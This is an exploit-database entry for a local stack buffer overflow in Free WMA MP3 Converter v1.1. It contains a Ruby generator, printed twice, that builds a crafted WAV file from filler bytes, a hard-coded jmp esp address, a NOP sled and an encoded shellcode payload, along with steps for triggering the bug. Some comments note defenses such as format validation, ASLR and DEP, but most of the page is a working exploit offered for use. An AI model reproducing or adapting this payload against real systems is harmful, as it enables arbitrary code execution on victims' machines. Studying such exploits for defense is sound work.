Free WMA MP3 Converter v1.1 0day

2010-04-02T00:00:00
ID 1337DAY-ID-11575
Type zdt
Reporter Richard leahy
Modified 2010-04-02T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ================================
Free WMA MP3 Converter v1.1 0day
================================


# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
#category local exploit

To trigger the vulnerability, open the application, choose WAV to MP3, load the specially crafted WAV file and click Convert. It probably works for all the other options too,
e.g. MP3 to WAV. Run the code below and pipe its output into a .wav file.

#code
!#/usr/bin/env ruby
# Proof-of-concept generator for the crafted input file mentioned in the
# advisory text: it prints filler + a 4-byte address + padding + payload to
# stdout.
#
# Defender notes:
#   - The output begins with a long run of 0x41 bytes instead of a RIFF/WAVE
#     header, so validating the container format of .wav inputs would reject
#     it before any conversion code runs.
#   - The layout (fixed-length filler followed by an address) points to an
#     unchecked copy into a fixed-size stack buffer in the converter. This is
#     inferred from the PoC; the vulnerable code is not shown on this page.
#   - The technique depends on a fixed module address and on executing data
#     placed on the stack, so ASLR and enforced DEP each break one of those
#     assumptions, and stack cookies (/GS) target the overwrite itself.

# Single-byte x86 NOP (0x90), used below as padding between the address and
# the payload.
nop = "\x90"

# Hard-coded address that the author attributes to imagehlp (presumably
# imagehlp.dll as loaded on the tested Windows XP SP2 system -- confirm).
# pack('V') encodes it as a 32-bit little-endian value. The variable name
# suggests the address holds a `jmp esp` instruction; that cannot be verified
# from this page.
jmp_esp = [0x76cafa32].pack('V')

# Opaque machine-code payload. The author states it opens notepad; the bytes
# are not decoded here, so treat that description as unverified.
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

# Final layout: 4112 bytes of "A" (0x41) filler, the 4-byte address, 10 NOPs,
# then the payload. 4112 is presumably the distance from the start of the
# overflowed buffer to the saved return address -- not shown on this page.
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
# Writes the assembled string to stdout.
puts boom 


# Date: 02/04/2010
# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows Xp Sp2
#category local exploit

To trigger the vulnerability, open the application, choose WAV to MP3, load the specially crafted WAV file and click Convert. It probably works for all the other options too,
e.g. MP3 to WAV. Run the code below and pipe its output into a .wav file.

#code
!#/usr/bin/env ruby
# Second copy of the proof-of-concept generator on this page: it prints
# filler + a 4-byte address + padding + payload to stdout.
#
# Defender notes:
#   - The output begins with a long run of 0x41 bytes instead of a RIFF/WAVE
#     header, so validating the container format of .wav inputs would reject
#     it before any conversion code runs.
#   - The fixed-length filler followed by an address points to an unchecked
#     copy into a fixed-size stack buffer in the converter (inferred from the
#     PoC; the vulnerable code is not shown on this page).
#   - A hard-coded module address and code placed on the stack are both
#     required, which is what ASLR and enforced DEP respectively take away.

# x86 NOP byte (0x90), used as padding ahead of the payload.
nop = "\x90"

# Hard-coded address attributed by the author to imagehlp (presumably the
# DLL as loaded on the tested Windows XP SP2 system -- confirm), encoded as
# 32-bit little-endian by pack('V'). That it holds a `jmp esp` is suggested
# only by the variable name.
jmp_esp = [0x76cafa32].pack('V')

# Opaque machine-code payload; "opens notepad" is the author's claim and is
# not verified here.
shellcode =
"\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

# Layout of the emitted string: 4112 "A" (0x41) bytes, the 4-byte address,
# 10 NOPs, then the payload. The 4112 offset is presumably where the saved
# return address sits relative to the buffer -- not shown on this page.
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
# Writes the assembled string to stdout.
puts boom 


